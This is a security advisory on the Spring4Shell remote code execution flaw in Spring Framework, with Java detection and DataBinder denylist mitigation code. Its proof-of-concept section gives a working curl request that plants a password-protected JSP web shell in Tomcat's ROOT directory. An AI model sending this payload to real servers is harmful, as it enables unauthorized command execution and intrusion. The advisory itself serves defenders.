Category: Vulnerability Intelligence | Vulnerability Class: Remote code execution | CVE ID: To be assigned | CVSS:3.0 Score: To be assigned
Spring4Shell - Executive Summary
- A new critical zero-day vulnerability in the popular Spring Framework for Java came into the spotlight when an exploit for it was first published on Twitter by the Chinese security researcher “heige” (@80vul).
- It was later confirmed that the issue is a bypass of the fix for an older vulnerability, CVE-2010-1622, and that it affects Spring Core running on JDK 9 and later, allowing an attacker to perform remote code execution on vulnerable systems.
- A similar attack scenario was seen in December 2021, when servers exposed through Log4j were mass-exploited to carry out large-scale ransomware attacks.
Analysis
About Spring Framework
The Spring Framework is an open-source application framework that provides infrastructure support for developing Java applications. Spring is the world's most popular lightweight open-source Java framework and streamlines the Java enterprise application development cycle for developers. Java, Spring Boot, Auth0, Bugsnag, and Java EE are some of the popular tools that integrate with Spring. 544 companies reportedly use Spring in their tech stacks, including Accenture and Zalando.
Exploitation
To successfully exploit the vulnerability, DataBinder must be enabled (that is, request parameters must be bound onto a Java object). In some cases, all an attacker needs to do is submit a specially crafted HTTP request to a vulnerable system. Conversely, exploiting certain other configurations requires extra research to develop an effective payload.
On Successful Exploitation
Threat actors can leverage these exploits to run commands on the server, granting them initial access to the device.
Mass Scanning
Because exploitation involves only a simple HTTP POST to a vulnerable application, threat actors will be able to devise scripts that crawl the Internet and automatically exploit susceptible servers.
Note: The Java Spring Core zero-day vulnerability, also dubbed “Spring4Shell”, is unrelated to the other vulnerabilities disclosed in the Spring framework this week, including the DoS vulnerability (CVE-2022-22950) and the Spring Cloud expression resource access vulnerability (CVE-2022-22963).
Information from OSINT
The various posts related to the exploit released for Spring4Shell are listed as follows:
- The leaked PoC by “helloexp”, which appeared to allow unauthenticated attackers to execute code on target systems, was later deleted.
Proof of Concept (Exploit)
curl -v -d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-SNAPSHOT/rapid7
This payload drops a password-protected web shell named tomcatwar.jsp into the Tomcat ROOT directory. The %{c1}i, %{c2}i and %{suffix}i tokens in the pattern are Tomcat access-log placeholders that are filled from request headers of the same name; they appear as dashes in the decoded form below.
- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } -
This Tomcat-specific payload alters the Tomcat access-log valve's properties (pattern, suffix, directory, prefix and fileDateFormat) through the ClassLoader reachable from the bound object. The payload simply redirects the logging output into the ROOT directory, so the next log write drops the file together with the payload.
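As a defender-side illustration of what the request above looks like on the wire, the following is an added example (not code from the advisory or from any vendor): it takes a URL-encoded form body, decodes each parameter name, and reports the names that hit the "class.*" denylist the Mitigation section recommends. The simpleMatch helper is a hypothetical re-implementation of the single-wildcard matching that Spring's DataBinder uses for disallowed fields; the two request bodies are constructed sample input.

```java
// Added example: triage a captured form body for Spring4Shell-style
// property-path injection. Not part of the original advisory.
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;

public class Spring4ShellRequestTriage {

    // Same denylist the advisory recommends for DataBinder and WAF filtering.
    static final String[] DENYLIST = {"class.*", "Class.*", "*.class.*", "*.Class.*"};

    // Hypothetical re-implementation of the "*" wildcard semantics used by
    // DataBinder.setDisallowedFields (assumption: mirrors PatternMatchUtils.simpleMatch).
    static boolean simpleMatch(String pattern, String str) {
        if (pattern == null || str == null) return false;
        int firstIndex = pattern.indexOf('*');
        if (firstIndex == -1) return pattern.equals(str);
        if (firstIndex == 0) {
            if (pattern.length() == 1) return true;           // bare "*"
            int nextIndex = pattern.indexOf('*', 1);
            if (nextIndex == -1) return str.endsWith(pattern.substring(1));
            String part = pattern.substring(1, nextIndex);
            if (part.isEmpty()) return simpleMatch(pattern.substring(nextIndex), str);
            int partIndex = str.indexOf(part);
            while (partIndex != -1) {
                if (simpleMatch(pattern.substring(nextIndex), str.substring(partIndex + part.length()))) {
                    return true;
                }
                partIndex = str.indexOf(part, partIndex + 1);
            }
            return false;
        }
        // Literal prefix before the first "*", then match the remainder.
        return str.length() >= firstIndex
                && pattern.substring(0, firstIndex).equals(str.substring(0, firstIndex))
                && simpleMatch(pattern.substring(firstIndex), str.substring(firstIndex));
    }

    /** Returns the decoded parameter names in a form body that match the denylist. */
    static List<String> flaggedParameters(String formBody) {
        List<String> hits = new ArrayList<>();
        for (String pair : formBody.split("&")) {
            int eq = pair.indexOf('=');
            String rawName = (eq == -1) ? pair : pair.substring(0, eq);
            String name = URLDecoder.decode(rawName, StandardCharsets.UTF_8);
            for (String pattern : DENYLIST) {
                if (simpleMatch(pattern, name)) {
                    hits.add(name);
                    break;
                }
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        // Constructed sample input: an ordinary form post and a body shaped like the
        // PoC above (only the parameter names matter for this check).
        String benign = "name=alice&age=42";
        String suspicious =
                "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
              + "&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT"
              + "&name=bob";
        System.out.println("benign     -> " + flaggedParameters(benign));      // []
        System.out.println("suspicious -> " + flaggedParameters(suspicious));  // the two classLoader paths
    }
}
```

Run it with `java Spring4ShellRequestTriage.java` on JDK 11 or later. The check keys on parameter names rather than values because the attack is a property-path injection: the dangerous part of the PoC is the "class.module.classLoader..." path, not what is assigned to it, which is also why a WAF rule that only inspects values would miss it.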
Spring4Shell - Impact: Who and What
Users running JDK version 9 and newer are vulnerable to an RCE attack. All versions of Spring Core are also said to be impacted.
At present, there is no official patch from Spring, so threat actors can leverage this vulnerability to perform unauthorized remote code execution. Due to the ease of exploitation, threat actors may undertake large-scale exploitation activity similar to what followed Log4j, and attackers can use the vulnerability to carry out malware or ransomware attacks on an organization.
Mitigation
In Spring Framework, DataBinder can be configured to disallow certain field patterns. As a temporary mitigation for this vulnerability, a ControllerAdvice component (a Spring component shared across controllers) can be created and the dangerous patterns added to the denylist.
On network protection devices such as a WAF, implement rule filtering for strings such as "class.*", "Class.*", "*.class.*", and "*.Class.*", tuned to the actual traffic of the deployed services. This is necessary because "Spring4Shell" works through class injection via these property paths, which is what makes it so severe.
Lastly, stay updated on the latest release of official patches from Spring and remediate the vulnerability according to those patches.
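The temporary DataBinder mitigation described above, written out as an added example that is not the Spring project's own code. The class name BinderControllerAdvice is an assumption; the annotations, the WebDataBinder type and setDisallowedFields are real Spring Framework APIs, and the denylist is the one listed above.

```java
// Added example: global denylist for DataBinder via a shared ControllerAdvice.
// Not part of the original advisory or of the Spring project.
import org.springframework.core.Ordered;
import org.springframework.core.annotation.Order;
import org.springframework.web.bind.WebDataBinder;
import org.springframework.web.bind.annotation.ControllerAdvice;
import org.springframework.web.bind.annotation.InitBinder;

@ControllerAdvice
@Order(Ordered.LOWEST_PRECEDENCE) // ordering only affects other ControllerAdvice beans
public class BinderControllerAdvice {

    // Property paths that must never be bound from request parameters. The nested
    // "class.module.classLoader..." path in the PoC begins with "class.", so binding
    // is refused before DataBinder ever reaches the ClassLoader.
    private static final String[] DENYLIST = {"class.*", "Class.*", "*.class.*", "*.Class.*"};

    // @InitBinder in a ControllerAdvice runs for every controller's WebDataBinder.
    @InitBinder
    public void setDisallowedFields(WebDataBinder binder) {
        binder.setDisallowedFields(DENYLIST);
    }
}
```

One caveat worth checking before relying on this: global advice @InitBinder methods run before a controller's own @InitBinder methods, and setDisallowedFields replaces the list rather than appending to it, so any controller that sets its own disallowed fields locally must include these patterns itself or the global denylist is silently lost for that controller.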
References
- SpringShell: Spring Core RCE 0-day Vulnerability - Cyber Kendra
- Unpatched Java Spring Framework 0-Day RCE Bug Threatens Enterprise Web Apps Security
- Spring4Shell: Zero-Day Vulnerability in Spring Framework | Rapid7 Blog
- Spring Core on JDK9+ is vulnerable to remote code execution - Praetorian
- https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/